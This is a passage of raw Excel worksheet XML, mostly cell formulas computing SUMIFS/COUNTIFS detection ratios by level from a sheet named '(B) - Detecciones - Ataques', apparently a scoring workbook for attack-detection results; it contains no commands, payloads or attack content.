        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW47,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW47 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW47,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW47 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.5</v>
      </c>
      <c r="FA47" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW47,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW47 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW47,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW47 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0.8333333333</v>
      </c>
    </row>
    <row r="48">
      <c r="DH48" s="488"/>
      <c r="DI48" s="693" t="s">
        <v>2688</v>
      </c>
      <c r="DJ48" s="694" t="s">
        <v>2689</v>
      </c>
      <c r="EJ48" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ40&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ40*'(B) - Detecciones - Ataques'!HN40/('(B) - Detecciones - Ataques'!HN40+'(B) - Detecciones - Ataques'!HO40),0)</f>
        <v>1</v>
      </c>
      <c r="EK48" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ40&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ40*'(B) - Detecciones - Ataques'!HO40/('(B) - Detecciones - Ataques'!HN40+'(B) - Detecciones - Ataques'!HO40),0)</f>
        <v>0</v>
      </c>
      <c r="EM48" s="571"/>
      <c r="EW48" s="379" t="s">
        <v>357</v>
      </c>
      <c r="EX48" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW48)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW48 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW48)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW48 &amp; "*"))</f>
        <v>0.7</v>
      </c>
      <c r="EY48" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW48)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW48 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW48)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW48 &amp; "*"))</f>
        <v>0.8</v>
      </c>
      <c r="EZ48" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW48,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW48 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW48,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW48 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.6666666667</v>
      </c>
      <c r="FA48" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW48,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW48 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW48,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW48 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>1</v>
      </c>
    </row>
    <row r="49">
      <c r="DH49" s="695" t="s">
        <v>20</v>
      </c>
      <c r="DI49" s="696">
        <f>DH23</f>
        <v>0</v>
      </c>
      <c r="DJ49" s="681">
        <f>DL23</f>
        <v>0</v>
      </c>
      <c r="EJ49" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ41&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ41*'(B) - Detecciones - Ataques'!HN41/('(B) - Detecciones - Ataques'!HN41+'(B) - Detecciones - Ataques'!HO41),0)</f>
        <v>1</v>
      </c>
      <c r="EK49" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ41&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ41*'(B) - Detecciones - Ataques'!HO41/('(B) - Detecciones - Ataques'!HN41+'(B) - Detecciones - Ataques'!HO41),0)</f>
        <v>0</v>
      </c>
      <c r="EM49" s="571"/>
      <c r="EW49" s="379" t="s">
        <v>310</v>
      </c>
      <c r="EX49" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW49)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW49 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW49)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW49 &amp; "*"))</f>
        <v>0.3012371907</v>
      </c>
      <c r="EY49" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW49)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW49 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW49)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW49 &amp; "*"))</f>
        <v>0.8</v>
      </c>
      <c r="EZ49" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW49,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW49 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW49,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW49 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.3353953178</v>
      </c>
      <c r="FA49" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW49,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW49 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW49,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW49 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0.5</v>
      </c>
    </row>
    <row r="50">
      <c r="EJ50" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ42&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ42*'(B) - Detecciones - Ataques'!HN42/('(B) - Detecciones - Ataques'!HN42+'(B) - Detecciones - Ataques'!HO42),0)</f>
        <v>0</v>
      </c>
      <c r="EK50" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ42&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ42*'(B) - Detecciones - Ataques'!HO42/('(B) - Detecciones - Ataques'!HN42+'(B) - Detecciones - Ataques'!HO42),0)</f>
        <v>0</v>
      </c>
      <c r="EM50" s="571"/>
      <c r="EW50" s="379" t="s">
        <v>292</v>
      </c>
      <c r="EX50" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW50)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW50 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW50)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW50 &amp; "*"))</f>
        <v>0.6</v>
      </c>
      <c r="EY50" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW50)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW50 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW50)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW50 &amp; "*"))</f>
        <v>0.6</v>
      </c>
      <c r="EZ50" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW50,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW50 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW50,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW50 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.3333333333</v>
      </c>
      <c r="FA50" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW50,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW50 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW50,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW50 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>1</v>
      </c>
    </row>
    <row r="51">
      <c r="EJ51" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ43&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ43*'(B) - Detecciones - Ataques'!HN43/('(B) - Detecciones - Ataques'!HN43+'(B) - Detecciones - Ataques'!HO43),0)</f>
        <v>1</v>
      </c>
      <c r="EK51" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ43&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ43*'(B) - Detecciones - Ataques'!HO43/('(B) - Detecciones - Ataques'!HN43+'(B) - Detecciones - Ataques'!HO43),0)</f>
        <v>0</v>
      </c>
      <c r="EM51" s="571"/>
      <c r="EW51" s="422" t="s">
        <v>558</v>
      </c>
      <c r="EX51" s="691">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW51)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW51 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW51)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW51 &amp; "*"))</f>
        <v>0.4431818182</v>
      </c>
      <c r="EY51" s="692">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW51)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW51 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW51)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW51 &amp; "*"))</f>
        <v>0.75</v>
      </c>
      <c r="EZ51" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW51,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW51 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW51,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW51 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.5</v>
      </c>
      <c r="FA51" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW51,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW51 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW51,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW51 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>1</v>
      </c>
    </row>
    <row r="52">
      <c r="EJ52" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ44&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ44*'(B) - Detecciones - Ataques'!HN44/('(B) - Detecciones - Ataques'!HN44+'(B) - Detecciones - Ataques'!HO44),0)</f>
        <v>0</v>
      </c>
      <c r="EK52" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ44&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ44*'(B) - Detecciones - Ataques'!HO44/('(B) - Detecciones - Ataques'!HN44+'(B) - Detecciones - Ataques'!HO44),0)</f>
        <v>0</v>
      </c>
      <c r="EM52" s="571"/>
    </row>
    <row r="53">
      <c r="EJ53" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ45&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ45*'(B) - Detecciones - Ataques'!HN45/('(B) - Detecciones - Ataques'!HN45+'(B) - Detecciones - Ataques'!HO45),0)</f>
        <v>0</v>
      </c>
      <c r="EK53" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ45&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ45*'(B) - Detecciones - Ataques'!HO45/('(B) - Detecciones - Ataques'!HN45+'(B) - Detecciones - Ataques'!HO45),0)</f>
        <v>0</v>
      </c>
      <c r="EM53" s="571"/>
    </row>
    <row r="54">
      <c r="EJ54" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ46&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ46*'(B) - Detecciones - Ataques'!HN46/('(B) - Detecciones - Ataques'!HN46+'(B) - Detecciones - Ataques'!HO46),0)</f>
        <v>0</v>
      </c>
      <c r="EK54" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ46&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ46*'(B) - Detecciones - Ataques'!HO46/('(B) - Detecciones - Ataques'!HN46+'(B) - Detecciones - Ataques'!HO46),0)</f>
        <v>0</v>
      </c>
      <c r="EM54" s="571"/>
    </row>
    <row r="55">
      <c r="EJ55" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ47&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ47*'(B) - Detecciones - Ataques'!HN47/('(B) - Detecciones - Ataques'!HN47+'(B) - Detecciones - Ataques'!HO47),0)</f>
        <v>1</v>
      </c>
      <c r="EK55" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ47&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ47*'(B) - Detecciones - Ataques'!HO47/('(B) - Detecciones - Ataques'!HN47+'(B) - Detecciones - Ataques'!HO47),0)</f>
        <v>0</v>
      </c>
      <c r="EM55" s="571"/>
    </row>
    <row r="56">
      <c r="EJ56" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ48&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ48*'(B) - Detecciones - Ataques'!HN48/('(B) - Detecciones - Ataques'!HN48+'(B) - Detecciones - Ataques'!HO48),0)</f>
        <v>1</v>
      </c>
      <c r="EK56" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ48&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ48*'(B) - Detecciones - Ataques'!HO48/('(B) - Detecciones - Ataques'!HN48+'(B) - Detecciones - Ataques'!HO48),0)</f>
        <v>0</v>
      </c>
      <c r="EM56" s="571"/>
    </row>
    <row r="57">
      <c r="EJ57" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ49&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ49*'(B) - Detecciones - Ataques'!HN49/('(B) - Detecciones - Ataques'!HN49+'(B) - Detecciones - Ataques'!HO49),0)</f>
        <v>1</v>
      </c>
      <c r="EK57" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ49&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ49*'(B) - Detecciones - Ataques'!HO49/('(B) - Detecciones - Ataques'!HN49+'(B) - Detecciones - Ataques'!HO49),0)</f>
        <v>0</v>
      </c>
      <c r="EM57" s="571"/>
    </row>
    <row r="58">
      <c r="EJ58" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ50&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ50*'(B) - Detecciones - Ataques'!HN50/('(B) - Detecciones - Ataques'!HN50+'(B) - Detecciones - Ataques'!HO50),0)</f>
        <v>0</v>
      </c>
      <c r="EK58" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ50&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ50*'(B) - Detecciones - Ataques'!HO50/('(B) - Detecciones - Ataques'!HN50+'(B) - Detecciones - Ataques'!HO50),0)</f>
        <v>0</v>
      </c>
      <c r="EM58" s="571"/>
    </row>
    <row r="59">
      <c r="EJ59" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ51&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ51*'(B) - Detecciones - Ataques'!HN51/('(B) - Detecciones - Ataques'!HN51+'(B) - Detecciones - Ataques'!HO51),0)</f>
        <v>1</v>
      </c>
      <c r="EK59" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ51&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ51*'(B) - Detecciones - Ataques'!HO51/('(B) - Detecciones - Ataques'!HN51+'(B) - Detecciones - Ataques'!HO51),0)</f>
        <v>0</v>
      </c>
      <c r="EM59" s="571"/>
    </row>
    <row r="60">
      <c r="EJ60" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ52&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ52*'(B) - Detecciones - Ataques'!HN52/('(B) - Detecciones - Ataques'!HN52+'(B) - Detecciones - Ataques'!HO52),0)</f>
        <v>1</v>
      </c>
      <c r="EK60" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ52&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ52*'(B) - Detecciones - Ataques'!HO52/('(B) - Detecciones - Ataques'!HN52+'(B) - Detecciones - Ataques'!HO52),0)</f>
        <v>0</v>
      </c>
      <c r="EM60" s="571"/>
    </row>
    <row r="61">
      <c r="EJ61" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ53&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ53*'(B) - Detecciones - Ataques'!HN53/('(B) - Detecciones - Ataques'!HN53+'(B) - Detecciones - Ataques'!HO53),0)</f>
        <v>1</v>
      </c>
      <c r="EK61" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ53&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ53*'(B) - Detecciones - Ataques'!HO53/('(B) - Detecciones - Ataques'!HN53+'(B) - Detecciones - Ataques'!HO53),0)</f>
        <v>0</v>
      </c>
      <c r="EM61" s="571"/>
    </row>
    <row r="62">
      <c r="O62" s="697"/>
      <c r="P62" s="2"/>
      <c r="Q62" s="2"/>
      <c r="R62" s="2"/>
      <c r="S62" s="2"/>
      <c r="T62" s="2"/>
      <c r="U62" s="2"/>
      <c r="V62" s="2"/>
      <c r="W62" s="2"/>
      <c r="X62" s="2"/>
      <c r="Y62" s="2"/>
      <c r="Z62" s="2"/>
      <c r="AA62" s="2"/>
      <c r="AB62" s="3"/>
      <c r="EJ62" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ54&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ54*'(B) - Detecciones - Ataques'!HN54/('(B) - Detecciones - Ataques'!HN54+'(B) - Detecciones - Ataques'!HO54),0)</f>
        <v>1</v>
      </c>
      <c r="EK62" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ54&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ54*'(B) - Detecciones - Ataques'!HO54/('(B) - Detecciones - Ataques'!HN54+'(B) - Detecciones - Ataques'!HO54),0)</f>
        <v>0</v>
      </c>
      <c r="EM62" s="571"/>
    </row>
    <row r="63">
      <c r="O63" s="653"/>
      <c r="P63" s="698"/>
      <c r="Q63" s="698"/>
      <c r="R63" s="698"/>
      <c r="S63" s="698"/>
      <c r="T63" s="698"/>
      <c r="U63" s="698"/>
      <c r="V63" s="698"/>
      <c r="W63" s="698"/>
      <c r="X63" s="698"/>
      <c r="Y63" s="698"/>
      <c r="Z63" s="698"/>
      <c r="AA63" s="698"/>
      <c r="AB63" s="699"/>
      <c r="EJ63" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ55&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ55*'(B) - Detecciones - Ataques'!HN55/('(B) - Detecciones - Ataques'!HN55+'(B) - Detecciones - Ataques'!HO55),0)</f>
        <v>1</v>
      </c>
      <c r="EK63" s="626">
